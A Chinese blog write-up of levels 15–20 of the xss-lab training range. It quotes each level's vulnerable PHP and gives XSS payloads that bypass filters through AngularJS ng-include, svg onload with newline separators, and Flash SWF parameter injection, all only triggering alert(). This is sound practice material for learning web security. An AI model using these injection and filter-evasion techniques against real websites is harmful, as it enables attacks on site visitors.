xss-lab靶场的level15-level20

这一部分后面四个全部是flash的xss漏洞

建议先了解一下这一漏洞详情Flash XSS 漏洞详解 根治的好办法-CSDN博客

然后记得在自己浏览器上下载一个flash插件

level15
window.location.href="level16.php?keyword=test";
但是输入keyword没啥用
于是查看源代码发现
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>
get提交的参数是src,并且被html实体化
而且ng-include 是 AngularJS 中的一个指令,它允许你在一个 HTML 元素中动态地包含另一个 HTML 片段。这个指令会根据提供的 URL 或者 AngularJS 表达式来加载、编译并包含外部 HTML 内容。
并且可以无视转换实体

?src='/level1.php?name=<img src=1 οnmοuseοver=alert()>'

level16
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace(" ","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>

?keyword=<svg%0Aοnlοad=alert(1)>


level17:
f12查看源代码
<embed src=xsf01.swf?= width=100% heigth=100%><h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>

swf后缀的文件是flash插件文件
embed标签定义了一个容器,用来嵌入外部应用或者互动程序,可以等效于img、iframe、video等
这道题需要下一个flash浏览器,建议官网下flash
或者修改一下
echo "<embed src=index.php?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
再构造payload
?arg02= οnclick=alert()

level18
<embed src=xsf02.swf?a=b width=100% heigth=100%></body>
依然有一个swf文件,修改一下
?arg02= οnmοusedοwn=alert()

level19
这一关用的是flash的xss漏洞,可以看这篇文章
https://blog.csdn.net/weixin_30702413/article/details/99326627

?arg01=version&arg02=<a href="javascript:alert()">here</a>

level20
这一关依然是flash的xss注入
这一关我就直接用csdn上某位大佬的代码进行注入
?arg01=id&arg02=xss\"))}catch(e){alert(1)}//%26width=123%26height=123
 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值